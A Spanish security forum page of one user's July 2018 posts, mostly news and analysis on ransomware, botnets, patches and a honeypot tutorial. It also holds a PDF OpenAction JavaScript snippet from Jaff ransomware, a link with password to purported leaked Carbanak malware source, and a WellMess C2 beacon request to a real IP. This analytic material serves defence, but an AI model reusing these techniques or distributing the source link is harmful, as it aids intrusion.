Últimos Temas de: r32

Mostrar Temas
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ... 39

201	Seguridad Informática / Análisis y Diseño de Malware / Jaff Ransomware Escondido en un documento PDF	en: 11 Julio 2018, 20:05 pm
El desafío para un autor de malware hoy tiene más que ver con la creatividad que con un conocimiento técnico profundo. Hay muchas buenas herramientas de construcción de troyanos para facilitar el trabajo. Pero una vez que el autor tiene una creación terminada, el gran desafío es cómo llevar el producto terminado a las víctimas. Incrustar malware dentro de un documento de Word es ahora un lugar común. Por lo general, se trata de una Macro lanzada por la función 'habilitar contenido', también conocida como la función 'Por favor, infecta mi máquina'. Los autores de malware han dado el siguiente paso lógico utilizando un documento PDF como punto de partida. Un PDF no es solo un documento legible fijo. Tiene muchas más características como dibujar y crear formularios. Es importante destacar que para los autores de malware, un documento PDF puede interpretar javascript. Echemos un vistazo al análisis de malware donde el autor creó un documento PDF incrustado con javascript que crea un documento de Microsoft Word con un VBScript incrustado para ejecutar Jaff Ransomware. Análisis de Jaff Ransomware Después de cargar el archivo "nm.pdf" de aspecto inocente al VMRay Analyzer, obtuvimos un puntaje extremadamente alto de VTI (VMRay Threat Identifier): 100/100. Para entender por qué el puntaje es tan alto, comenzamos mirando la Información de VTI. La segunda entrada sugiere lo que el título del blog ya ha insinuado: "Cambiar el nombre de varios archivos de usuario". Este es un indicador para un intento de cifrado. Ciertamente estamos lidiando con el ransomware. pero como funciona? El documento PDF no se puede ejecutar como un archivo ejecutable. En el informe de VMRay Analyzer, podemos volver a la página de resumen y mirar el gráfico del proceso. Esto nos muestra un comportamiento realmente nuevo al abrir un documento PDF. Primero, para abrir el archivo "nm.pdf", se inicia el proceso de Acrobat Reader "acrord32.exe" y se carga el PDF. Luego aparece un mensaje y solicita abrir un archivo "EQV6A.docm". Este mensaje nos advierte sobre la necesidad de abrir este archivo porque podría dañar nuestra computadora. Esto funciona porque el documento PDF tiene un javascript incrustado que se inicia cuando se abre el documento. Código: << /Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction << /S/javascript/JS(submarine();) >> >> Más información: https://www.vmray.com/cyber-security-blog/jaff-ransomware-hiding-in-a-pdf-document/ Saludos.

202	Seguridad Informática / Análisis y Diseño de Malware / Carbanak: ¿se filtró el código fuente?	en: 11 Julio 2018, 19:35 pm
Info: https://en.wikipedia.org/wiki/Carbanak https://latam.kaspersky.com/resource-center/threats/carbanak-apt Link: https://s3-eu-west-1.amazonaws.com/malware-research.org/blogposts/carbanak_leak/carbanak_source_code_leak_maybe.zip Pass: f1Up$zD%QY*p5@!& Saludos.

203	Foros Generales / Noticias / Hide 'N Seek Botnet IoT puede infectar servidores de base de datos	en: 10 Julio 2018, 21:06 pm
La botnet Hide 'N Seek de Internet of Things (IoT) recientemente ha agregado soporte para más dispositivos y también puede infectar los servidores de bases de datos OrientDB y CouchDB, dicen los investigadores de NetLab de Qihoo 360. Cuando se detallaron por primera vez en enero de este año, la botnet estaba evolucionando y extendiéndose rápidamente, atrapando a decenas de miles de dispositivos en cuestión de días. Dirigido a numerosas vulnerabilidades, el malware era capaz de exfiltración de datos, ejecución de código e interferencia con el funcionamiento del dispositivo. A principios de mayo, el malware infectó más de 90,000 dispositivos, agregó código para atacar más vulnerabilidades y también adoptó la persistencia, pudiendo sobrevivir al reinicio. El módulo de persistencia, sin embargo, solo se activaría si la infección se realizó a través del servicio Telnet. Una red zombi de igual a igual (P2P), Hide 'N Seek ha seguido evolucionando, y actualmente está apuntando a aún más vulnerabilidades que antes. El botnet ahora también incluye exploits para dispositivos AVTECH (cámara web) y enrutadores Cisco Linksys, revela NetLab de Qihoo 360. Además, el malware ahora incluye 171 direcciones de nodo P2P codificadas, ha agregado un programa de minería criptodinámica a su código, y también se ha convertido en una amenaza multiplataforma, con la adición de soporte para los servidores de bases de datos OrientDB y CouchDB. El mecanismo de propagación de la botnet incluye un escáner tomado de Mirai, dirigido al puerto TCP fijo 80/8080/2480/5984/23 y otros puertos aleatorios. Para la infección, el malware intenta la ejecución remota de código utilizando explotaciones dirigidas a enrutadores TPLink, enrutadores Netgear (también segmentados por Reaper botnet y la variante Mirai Wicked), cámaras AVTECH, enrutadores Cisco Linksys, JAW / 1.0, OrientDB y Apache CouchDB. Más información: https://www.securityweek.com/hide-n-seek-iot-botnet-can-infect-database-servers Saludos.

204	Foros Generales / Noticias / Este ransomware acaba de agregar nuevos trucos para propagarse más rápido e infe	en: 10 Julio 2018, 21:02 pm
Este ransomware acaba de agregar nuevos trucos para propagarse más rápido e infectar PC con Windows XP. Un cambio en el mecanismo de cifrado y la capacidad de atacar máquinas con Windows XP a través de una vulnerabilidad SMB mejora la capacidad de proliferación de GandCrab. Una de las formas más activas de ransomware se ha actualizado con un nuevo medio de cifrado de datos como la pandilla detrás del aspecto del malware para garantizar que siga siendo lo más dañino posible. GandCrab ransomware apareció por primera vez en enero de este año y rápidamente se convirtió en una de las formas más populares del malware de bloqueo de archivos. Se vende a bajo precio en la web oscura como 'malware como servicio' y regularmente recibe actualizaciones de sus desarrolladores. Ahora se ha lanzado la última versión del ransomware y contiene lo que los investigadores de Fortinet describen como "una revisión en términos de la estructura del código", y algunos trucos nuevos bajo la manga. Uno de los mayores cambios en la versión 4 de GandCrab es que el mecanismo de cifrado pasó del RSA-2048 a un cifrado de flujo Salsa20 mucho más rápido, permitiendo que los archivos se cifren más rápidamente que antes. El mecanismo Salsa20 ya había sido implementado por Petya ransomware. Esta versión de GandCrab se sirve a las víctimas a través de sitios web comprometidos de WordPress que alientan a los usuarios a descargar herramientas del sistema a través de enlaces que resultan en la descarga del malware. Los investigadores dicen que el malware ejecutable y los enlaces de descarga se actualizan regularmente. Sin embargo, no determinan cómo se distribuirá una vez más mediante correos electrónicos de phishing en algún momento en el futuro. Más información: https://www.zdnet.com/article/this-ransomware-just-added-new-tricks-to-spread-faster-and-infect-windows-xp-pcs/ Saludos.

205	Foros Generales / Noticias / Múltiples vulnerabilidades de ejecución de código remoto de Adobe Acrobat DC	en: 10 Julio 2018, 20:59 pm
Descubierto por Aleksandar Nikolic de Cisco Talos Visión de conjunto Hoy, Talos está publicando detalles de nuevas vulnerabilidades dentro de Adobe Acrobat Reader DC. Adobe Acrobat Reader es el lector de PDF más popular y rico en características. Tiene una gran base de usuarios, generalmente es un lector de PDF predeterminado en los sistemas y se integra en los navegadores web como un complemento para la renderización de archivos PDF. Como tal, engañar a un usuario para visitar una página web maliciosa o enviar un archivo adjunto de correo electrónico especialmente diseñado puede ser suficiente para desencadenar estas vulnerabilidades. TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812) Un código javascript específico incrustado en un archivo PDF puede provocar confusión en el tipo de objeto al abrir un documento PDF en Adobe Acrobat Reader DC 2018.011.20038. Con una cuidadosa manipulación de la memoria, esto puede llevar a la ejecución de código arbitrario. Para activar esta vulnerabilidad, la víctima debería abrir el archivo malicioso o acceder a una página web maliciosa. La información detallada de vulnerabilidad se puede encontrar aquí. https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569 Más información: https://blog.talosintelligence.com/2018/07/vuln-spotlight-adobe-reader.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29 Saludos.

206	Foros Generales / Noticias / Microsoft lanza actualizaciones de parches para 53 vulnerabilidades en su softwa	en: 10 Julio 2018, 20:55 pm
Microsoft lanza actualizaciones de parches para 53 vulnerabilidades en su software. Es hora de adaptar sus sistemas y software para las últimas actualizaciones de parches de seguridad de julio de 2018. Microsoft lanzó hoy actualizaciones de parches de seguridad para 53 vulnerabilidades, que afectan a Windows, Internet Explorer (IE), Edge, ChakraCore, .NET Framework, ASP.NET, PowerShell, Visual Studio y Microsoft Office y Office Services, y Adobe Flash Player. De las 53 vulnerabilidades, 17 se clasifican como críticas, 34 importantes, una moderada y una de baja gravedad. Este mes no hay una vulnerabilidad crítica parchada en el sistema operativo Microsoft Windows y, sorprendentemente, ninguno de los defectos reparados por el gigante tecnológico este mes aparece como públicamente conocido o bajo ataque activo. Errores críticos parcheados en los productos de Microsoft La mayoría de los problemas críticos son fallas de corrupción de memoria en IE, navegador Edge y motor de scripts Chakra, que si se explota con éxito, podría permitir a un atacante remoto no autenticado ejecutar código arbitrario en un sistema específico en el contexto del usuario actual. "Si el usuario actual inicia sesión con derechos administrativos de usuario, un atacante que explotara con éxito la vulnerabilidad podría tomar el control de un sistema afectado. Un atacante podría entonces instalar programas, ver, cambiar o eliminar datos, o crear cuentas nuevas con usuario completo. derechos ", explica Microsoft. Uno de estos defectos críticos (CVE-2018-8327), informado por los investigadores de Casaba Security, también afecta a los Servicios Editor de PowerShell que podrían permitir a un atacante remoto ejecutar código malicioso en un sistema vulnerable. A continuación, puede encontrar una breve lista de todas las vulnerabilidades críticas que Microsoft ha parcheado este mes en sus diversos productos: Scripting Engine Memory Corruption Vulnerability (CVE-2018-8242) Edge Memory Corruption Vulnerability (CVE-2018-8262) Edge Memory Corruption Vulnerability (CVE-2018-8274) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8275) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8279) Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8280) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8283) Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8286) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8288) Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8290) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8291) Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8294) Scripting Engine Memory Corruption Vulnerability (CVE-2018-8296) Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8298) Microsoft Edge Memory Corruption Vulnerability (CVE-2018-8301) Microsoft Edge Information Disclosure Vulnerability (CVE-2018-8324) PowerShell Editor Services Remote Code Execution Vulnerability (CVE-2018-8327) Más información: https://thehackernews.com/2018/07/microsoft-security-patch-update.html?utm_source=dlvr.it&utm_medium=twitter Saludos.

207	Foros Generales / Noticias / Bloqueo de Facebook Messenger para Android con un ataque MITM	en: 10 Julio 2018, 20:51 pm
Resumen Facebook Messenger para Android se puede bloquear a través de la verificación de estado de la aplicación. Esto puede ser explotado por un atacante de MITM interceptando esa llamada y devolviendo una gran cantidad de datos. Esto sucede porque esta comprobación de estado no se realiza a través de SSL y la aplicación no contiene lógica para verificar si los datos devueltos son muy grandes. El vendedor no tiene planes inmediatos para solucionar este problema. Detalles de vulnerabilidad Facebook Messenger para Android es una aplicación de mensajería proporcionada por Facebook. Al monitorear el tráfico de red de un dispositivo de prueba que ejecuta Android, observamos que la aplicación realiza llamadas de red para verificar el estado del servidor. Esta llamada se realizó a través de HTTP sin el uso de SSL / TLS. URL de ejemplo: http://portal.fb.com/mobile/status.php Tuvimos éxito al bloquear la aplicación al inyectar un paquete grande porque la aplicación no maneja datos grandes que regresan correctamente y no usa SSL para esta llamada. También es importante tener en cuenta que esto le permitiría a alguien bloquear el uso de Messenger pero sin que los usuarios se den cuenta de que están siendo bloqueados, ya que atribuirán la falla de la aplicación a un error en lugar de a un bloqueo. Más información: http://seclists.org/fulldisclosure/2018/Jul/37?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+seclists%2FFullDisclosure+%28Full+Disclosure%29 https://wwws.nightwatchcybersecurity.com/2018/07/09/advisory-crashing-facebook-messenger-for-android-with-an-mitm-attack/ Saludos.

208	Seguridad Informática / Análisis y Diseño de Malware / ¡Ejecutar la trampa! Cómo configurar tu propio Honeypot para recolectar muestras	en: 9 Julio 2018, 22:52 pm
¡Ejecutar la trampa! Cómo configurar tu propio Honeypot para recolectar muestras de malware Introducción Este documento es cómo configurar su propio Honeypot (dionaea). Diría que a la mayoría de nosotros nos gustan los binarios de ingeniería inversa. Muchos de nosotros tenemos una fascinación con el malware. ¿Por qué no combinarlos y RE con algunos Malware que están siendo usados activamente para la explotación? Mi tutorial es cómo configurar un honeypot en Amazon Web Services (AWS). Si no está familiarizado con AWS, tldr; ellos tienen servidores, puedes usarlos. ProTip: si tiene 1 microinstancia con un disco duro adjunto de menos de 50 GB, puede tener un servidor gratuito. Tendrá que proporcionar la información de su tarjeta de crédito a AWS, pero se le permite un servidor gratuito para siempre, siempre y cuando permanezca en el "nivel libre". Ahora puede aumentar n-número de micro-instancias, pero solo obtiene lo que equivale a 1 mes de cantidad de horas, cada mes. Entonces, si activas 2 instancias micro, a mitad de camino del dinero, comenzarás a facturar hasta fin de mes. Así que ten cuidado. Nivel de autor: Skiddo Habilidades requeridas Comandos generales de Linux Comprensión general de las redes Requisitos Servidor (AWS funciona bien. Gratis con CC proporcionado) Descargo de responsabilidad (opcional) A algunos proveedores de hosting no les gusta el malware. Así que, quizás, no recopilen en sus servidores si no son geniales como usted. (Separe este encabezado del papel usando una regla horizontal) Paper: Configuración de AWS Comenzaré ahora a configurar su instancia de AWS. [Si no está utilizando AWS, salte a la próxima sección.] Continúe haciendo clic en EC2 y Crear una nueva instancia. (EC2 == Servidores AWS). Después de eso, desea seleccionar Ubuntu Server 14.04 LTS Luego, selecciona el tipo de micro-instancia: Genial, ahora para configurar detalles de instancia, seleccione "Asignar automáticamente IP pública" y configúrelo como "Habilitar". (No te preocupes por mi rol de IAM) Más información: https://0x00sec.org/t/run-the-trap-how-to-setup-your-own-honeypot-to-collect-malware-samples/7445 Saludos.

209	Seguridad Informática / Análisis y Diseño de Malware / Un dropper interesante....	en: 9 Julio 2018, 22:25 pm
https://app.any.run/tasks/ad02108c-1f77-423f-9baf-96445260f589 Saludos.

210

Seguridad Informática / Análisis y Diseño de Malware / Malware "WellMess" dirigido a Linux y Windows

en: 9 Julio 2018, 21:51 pm

Algunos programas maliciosos están diseñados para ejecutarse en múltiples plataformas y, por lo general, están escritos en Java. Por ejemplo, Adwind malware (introducido en un artículo anterior) está escrito en Java y se ejecuta en Windows y otros sistemas operativos. Golang es otro lenguaje de programación, y se usa para el controlador Mirai, que infecta los sistemas Linux.

Este artículo presenta el comportamiento del malware WellMess basado en nuestra observación. Es un tipo de malware programado en Golang y compilado de forma cruzada para que sea compatible tanto con Linux como con Windows. Para obtener más detalles sobre la función de malware, consulte también el informe de LAC [1].

Comportamiento de WellMess
Generalmente, los archivos ejecutables de Golang incluyen muchas bibliotecas requeridas en sí mismas. Esto generalmente aumenta el tamaño del archivo, lo que hace que WellMess sea más grande que 3 MB. Otra característica es que los nombres de funciones para los archivos ejecutables se pueden encontrar en el archivo mismo. (Incluso para los archivos eliminados, los nombres de las funciones se pueden recuperar utilizando herramientas como GoUtils2.0 [2]). A continuación se muestran los nombres de funciones utilizados en WellMess:

Código:

_/home/ubuntu/GoProject/src/bot/botlib.EncryptText
_/home/ubuntu/GoProject/src/bot/botlib.encrypt
_/home/ubuntu/GoProject/src/bot/botlib.Command
_/home/ubuntu/GoProject/src/bot/botlib.reply
_/home/ubuntu/GoProject/src/bot/botlib.Service
_/home/ubuntu/GoProject/src/bot/botlib.saveFile
_/home/ubuntu/GoProject/src/bot/botlib.UDFile
_/home/ubuntu/GoProject/src/bot/botlib.Download
_/home/ubuntu/GoProject/src/bot/botlib.Send
_/home/ubuntu/GoProject/src/bot/botlib.Work
_/home/ubuntu/GoProject/src/bot/botlib.chunksM
_/home/ubuntu/GoProject/src/bot/botlib.Join
_/home/ubuntu/GoProject/src/bot/botlib.wellMess
_/home/ubuntu/GoProject/src/bot/botlib.RandStringBytes
_/home/ubuntu/GoProject/src/bot/botlib.GetRandomBytes
_/home/ubuntu/GoProject/src/bot/botlib.Key
_/home/ubuntu/GoProject/src/bot/botlib.GenerateSymmKey
_/home/ubuntu/GoProject/src/bot/botlib.CalculateMD5Hash
_/home/ubuntu/GoProject/src/bot/botlib.Parse
_/home/ubuntu/GoProject/src/bot/botlib.Pack
_/home/ubuntu/GoProject/src/bot/botlib.Unpack
_/home/ubuntu/GoProject/src/bot/botlib.UnpackB
_/home/ubuntu/GoProject/src/bot/botlib.FromNormalToBase64
_/home/ubuntu/GoProject/src/bot/botlib.RandInt
_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal
_/home/ubuntu/GoProject/src/bot/botlib.KeySizeError.Error
_/home/ubuntu/GoProject/src/bot/botlib.New
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).BlockSize
_/home/ubuntu/GoProject/src/bot/botlib.convertFromString
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.Split
_/home/ubuntu/GoProject/src/bot/botlib.Cipher
_/home/ubuntu/GoProject/src/bot/botlib.Decipher
_/home/ubuntu/GoProject/src/bot/botlib.Pad
_/home/ubuntu/GoProject/src/bot/botlib.AES_Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.AES_Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.generateRandomString
_/home/ubuntu/GoProject/src/bot/botlib.deleteFile
_/home/ubuntu/GoProject/src/bot/botlib.Post
_/home/ubuntu/GoProject/src/bot/botlib.SendMessage
_/home/ubuntu/GoProject/src/bot/botlib.ReceiveMessage
_/home/ubuntu/GoProject/src/bot/botlib.Send.func1
_/home/ubuntu/GoProject/src/bot/botlib.init
_/home/ubuntu/GoProject/src/bot/botlib.(*KeySizeError).Error

Como se mencionó anteriormente, WellMess tiene una versión que se ejecuta en Windows (PE) y otra en Linux (ELF). Aunque hay algunas diferencias menores, ambas tienen la misma funcionalidad.

El malware se comunica con un servidor C & C utilizando solicitudes HTTP y realiza funciones basadas en los comandos recibidos. A continuación se muestra un ejemplo de la comunicación: (el valor de User-Agent varía por muestra).

Código:

POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Language: en-US,en;q=0.8
Cookie: c22UekXD=J41lrM+S01+KX29R+As21Sur+%3asRnW+3Eo+nIHjv+o6A7qGw+XQr%3aq+PJ9jaI+KQ7G.+FT2wr+wzQ3vd+3IJXC+lays+k27xd.+di%3abd+mHMAi+mYNZv+Mrp+S%2cV21.+ESollsY+6suRD+%2cx8O1m+%3azc+GYdrw.+FbWQWr+5pO8;1rf4EnE9=+WMyn8+8ogDA+WxR5R.+sFMwDnV+DFninOi+XaP+p4iY+82U.+hZb+QB6+kMBvT9R
Host: 45.123.190.168
Content-Length: 426
Expect: 100-continue
Accept-Encoding: deflate
Connection: Keep-Alive

pgY4C8 8JHqk RjrCa R9MS 3vc4Uk KKaRxH R8vg Tfj B3P,C 0RG9lFw DqF405. i3RU1 0lW 2BqdSn K3L Y7hEc. tzto yKU8 p1,E L2kKg pQcE1. b8V6S0Y 6akx, ggMcrXk 0csao Uwxn. fYVtWD rwt:BJ 5IBn rCMxZoo OsC. :ZXg pKT Re0 cJST1 L0GsC. 9dJZON9 qs29pPB pCTR:8 0hO0FK sK13UUw. jMA hDICL hGK1 qjRj1AY YMjAIeI. g7GEZPh gW:C eNX6 ptq kevfIyP. u,96r7c D:6ZiR fCC IIi cBvq,p. Vt96aEu JFLeu 0XtFJm ee4S 7M2. Uc68sF MArC5v 96ngG 9UvQGt 5:ut. qiE0xQ

Más información: https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Saludos.

Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ... 39